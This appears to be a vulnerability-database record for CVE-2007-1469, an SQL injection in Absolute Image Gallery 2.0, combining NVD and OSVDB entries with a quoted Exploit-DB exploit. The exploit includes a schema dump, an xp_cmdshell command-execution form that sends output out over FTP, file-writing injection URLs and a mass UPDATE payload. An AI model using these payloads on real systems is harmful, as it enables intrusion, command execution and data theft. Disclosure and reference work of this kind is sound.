ID CVE-2007-1469Type cveReporter NVDModified 2017-07-28T21:30:47
Description
SQL injection vulnerability in gallery.asp in Absolute Image Gallery 2.0 allows remote attackers to execute arbitrary SQL commands via the categoryid parameter in a viewimage action.
{"id": "CVE-2007-1469", "bulletinFamily": "NVD", "title": "CVE-2007-1469", "description": "SQL injection vulnerability in gallery.asp in Absolute Image Gallery 2.0 allows remote attackers to execute arbitrary SQL commands via the categoryid parameter in a viewimage action.", "published": "2007-03-16T17:19:00", "modified": "2017-07-28T21:30:47", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1469", "reporter": "NVD", "references": ["http://www.securityfocus.com/archive/1/archive/1/462971/100/0/threaded", "http://www.vupen.com/english/advisories/2007/1002", "https://exchange.xforce.ibmcloud.com/vulnerabilities/33005", "http://www.securityfocus.com/bid/22988", "http://securityreason.com/securityalert/2429"], "cvelist": ["CVE-2007-1469"], "type": "cve", "lastseen": "2017-07-29T11:21:55", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:xigla:absolute_image_gallery_xe:2.0"], "cvelist": ["CVE-2007-1469"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in gallery.asp in Absolute Image Gallery 2.0 allows remote attackers to execute arbitrary SQL commands via the categoryid parameter in a viewimage action.", "edition": 1, "enchantments": {}, "hash": "a4095d3bb44173162d47d5b76153ae9006e5de894f93096fa77e490a21db4fde", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "be4b1bd27dc090f19939773a4caafdb1", "key": "title"}, {"hash": "7b5d640c1240cf6e48ba7404519cea7e", "key": "href"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "5883b9909440fcc4e15a08bdb9a95c8b", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "959ce2362d3b9a94cdd8ac1c932dbefa", "key": "modified"}, {"hash": "36de31b6dbc510a6d69db6bbe83891a0", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "893706d32a41ef2f31fca44003773689", "key": "description"}, {"hash": "70a60ab9677c9a87bc5089d1ff6b5564", "key": "published"}, {"hash": "c4ab5c05eade79a3c906d69cd0dce510", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1469", "id": "CVE-2007-1469", "lastseen": "2016-09-03T08:35:26", "modified": "2011-03-07T21:52:11", "objectVersion": "1.2", "published": "2007-03-16T17:19:00", "references": ["http://www.securityfocus.com/archive/1/archive/1/462971/100/0/threaded", "http://www.vupen.com/english/advisories/2007/1002", "http://www.securityfocus.com/bid/22988", "http://securityreason.com/securityalert/2429", "http://xforce.iss.net/xforce/xfdb/33005"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-1469", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T08:35:26"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "c4ab5c05eade79a3c906d69cd0dce510"}, {"key": "cvelist", "hash": "36de31b6dbc510a6d69db6bbe83891a0"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "893706d32a41ef2f31fca44003773689"}, {"key": "href", "hash": "7b5d640c1240cf6e48ba7404519cea7e"}, {"key": "modified", "hash": "9a36eb097981baabdbd98d0f8654f762"}, {"key": "published", "hash": "70a60ab9677c9a87bc5089d1ff6b5564"}, {"key": "references", "hash": "8b36ba0b2bfe046388b3675a4cced093"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "be4b1bd27dc090f19939773a4caafdb1"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "fbdc7b44560fa1aab6dcdfc2f65719ae766d24c8be095c1a81f0c85fcaf39590", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-07-29T11:21:55"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:xigla:absolute_image_gallery_xe:2.0"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"osvdb": [{"lastseen": "2017-04-28T13:20:30", "references": [], "description": "## Vulnerability Description\nAbsolute Image Gallery contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'gallery.asp' script not properly sanitizing user-supplied input to the 'categoryid' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nAbsolute Image Gallery contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'gallery.asp' script not properly sanitizing user-supplied input to the 'categoryid' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\n[Secunia Advisory ID:24543](https://secuniaresearch.flexerasoftware.com/advisories/24543/)\nOther Advisory URL: http://milw0rm.com/exploits/3493\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0203.html\nISS X-Force ID: 33005\nFrSIRT Advisory: ADV-2007-1002\n[CVE-2007-1469](https://vulners.com/cve/CVE-2007-1469)\nBugtraq ID: 22988\n", "edition": 1, "reporter": "UniquE-Key{UniquE-Cracker}(unique@unique-key.org)", "published": "2007-03-15T11:03:50", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Absolute Image Gallery XE gallery.asp categoryid Variable SQL Injection", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [{"name": "Absolute Image Gallery XE", "version": "2.0", "operator": "eq"}], "cvelist": ["CVE-2007-1469"], "modified": "2007-03-15T11:03:50", "href": "https://vulners.com/osvdb/OSVDB:34239", "id": "OSVDB:34239", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "references": ["https://vulners.com/securityvulns/securityvulns:doc:16364", "https://vulners.com/securityvulns/securityvulns:doc:16363", "https://vulners.com/securityvulns/securityvulns:doc:16365"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "reporter": " ", "published": "2007-03-16T00:00:00", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:24", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Absolute Image Gallery", "version": "2.0", "operator": "eq"}, {"name": "FtpLocate", "version": "2.02", "operator": "eq"}], "cvelist": ["CVE-2007-1469"], "modified": "2007-03-16T00:00:00", "id": "SECURITYVULNS:VULN:7412", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7412", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:36:53", "osvdbidlist": ["34239"], "references": [], "description": "Absolute Image Gallery 2.0 (gallery.asp categoryid) SQL Injection Vuln. CVE-2007-1469. Webapps exploit for asp platform", "edition": 1, "reporter": "WiLdBoY", "published": "2007-03-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "exploitdb", "title": "Absolute Image Gallery 2.0 - gallery.asp categoryid SQL Injection Vuln", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1469"], "modified": "2007-03-15T00:00:00", "id": "EDB-ID:3493", "href": "https://www.exploit-db.com/exploits/3493/", "sourceData": "Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit\r\n\r\nType :\r\n\r\nSQL Injection\r\n\r\nRelease Date :\r\n\r\n{2007-03-15}\r\n\r\nProduct / Vendor :\r\n\r\nAbsolute Image Gallery\r\n\r\nhttp://www.xigla.com/absoluteig/\r\n\r\nBug :\r\n\r\nhttp://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nScript Table/Colon Name : \r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : articlefiles\r\n\r\nfileid\r\nfiletitle\r\nfilename\r\narticleid\r\nfiletype\r\nfilecomment\r\nurlfile\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : articles\r\n\r\narticleid\r\nposted\r\nlastupdate\r\nheadline\r\nheadlinedate\r\nstartdate\r\nenddate\r\nsource\r\nsummary\r\narticleurl\r\narticle\r\nstatus\r\nautoformat\r\npublisherid\r\nclicks\r\neditor\r\nrelatedid\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : iArticlesZones\r\n\r\narticleid\r\nzoneid\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : plugins\r\n\r\npluginid\r\npplname\r\npplfile\r\nppldescription\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : PPL1reviews\r\n\r\nreviewid\r\narticleid\r\nname\r\nreviewdate\r\nreview\r\ncomments\r\nisannonymous\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : publishers\r\n\r\npublisherid\r\nname\r\nusername\r\npassword\r\nemail\r\nadditional\r\nplevel\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : publisherszones\r\n\r\npublisherid\r\nzoneid\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : xlaAIGcategories\r\n\r\ncategoryid\r\ncatname\r\ncatdesc\r\nsupercatid\r\nlastupdate\r\ncatpath\r\nimages\r\nallowupload\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : xlaAIGimages\r\n\r\nimageid\r\nimagename\r\nimagedesc\r\nimagefile\r\nimagedate\r\nimagesize\r\ntotalrating\r\ntotalreviews\r\nhits\r\ncategoryid\r\nstatus\r\nuploadedby\r\nadditionalinfo\r\nembedhtml\r\nkeywords\r\ncopyright\r\ncredit\r\nsource\r\ndatecreated\r\nemail\r\ninfourl\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : xlaAIGpostcards\r\n\r\ndateposted\r\npostcardid\r\nimageid\r\nbgcolor\r\nbordercolor\r\nfonttype\r\nfontcolor\r\nrecipientname\r\nrecipientemail\r\ngreeting\r\nbgsound\r\nsendername\r\nsenderemail\r\nsendermsg\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : zones\r\n\r\nzonename\r\ndescription\r\ntemplate\r\narticlespz\r\nzonefont\r\nfontsize\r\nfontcolor\r\nshowsource\r\nshowsummary\r\nshowdates\r\nshowtn\r\ntextalign\r\ndisplayhoriz\r\ncellcolor\r\ntargetframe\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nMSSQL CMD Injection Exploit(For DBO Users) :\r\n\r\n<title>Absolute Image Gallery MSSQL CMD Injection Exploit</title>\r\n<body bgcolor=\"#000000\">\r\n<form name=\"Form\" method=\"get\" action=\"http://localhost/script/gallery.asp\">\r\n<center><font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>Absolute Image Gallery MSSQL CMD Injection Exploit</b></font><br><br></center>\r\n<center><font face=\"Verdana\" size=\"1\" color=\"#00FF00\"><b>Note : For DBO Users</b></font><br><br></center>\r\n<center><font face=\"Verdana\" size=\"1\" color=\"#00FF00\"><b>Example :</b></font><br><br></center>\r\n <tr>\r\n <center><img src=\"http://img382.imageshack.us/img382/7867/dirav8.jpg\"></center><br>\r\n <center><td align=\"right\"><font face=\"Arial\" size=\"1\" color=\"#00FF00\">Command Exec :</td>\r\n <td>\u00a0</td>\r\n <td><input name=\"action=viewimage&categoryid=-1\" type=\"text\" value=\";exec master..xp_cmdshell 'dir c:\\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--\" class=\"inputbox\" style=\"color: #000000\" style=\"width:300px; \"></td>\r\n </tr>\r\n <tr>\r\n <td align=\"right\"><font face=\"Arial\" size=\"1\" color=\"#00FF00\">Search Board</td>\r\n <td>\u00a0</td>\r\n <td>\r\n <select name=\"\">\r\n <option value=\"0\">(CMD)</option>\r\n </select>\u00a0<br><br>\r\n <input type=\"submit\" value=\"Apply\"></center>\r\n </td>\r\n </tr>\r\n</table>\r\n</form>\r\n<center><font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>UniquE-Key{UniquE-Cracker}</b></font>\r\n<br>\r\n<font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>UniquE@UniquE-Key.ORG</b></font>\r\n<br>\r\n<font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>http://UniquE-Key.ORG</b></font></center>\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nCode Injection(For DBO Users) :\r\n\r\nAdd Table : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);--\r\n\r\nASCII Code Add Database : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F373737287478742C6964292076616C7565732827272C3129+exec(@q);--\r\n\r\nCode Injection : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripting.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+out,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;--\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nUPDATE(ALL users) :\r\n\r\nhttp://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';--\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTested :\r\n\r\nAbsolute Image Gallery 2.0\r\n\r\nVulnerable :\r\n\r\nAbsolute Image Gallery 2.0\r\n\r\nAuthor :\r\n\r\nUniquE-Key{UniquE-Cracker}\r\nUniquE(at)UniquE-Key.Org\r\nhttp://www.UniquE-Key.Org\r\n\r\n# milw0rm.com [2007-03-15]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3493/"}]}
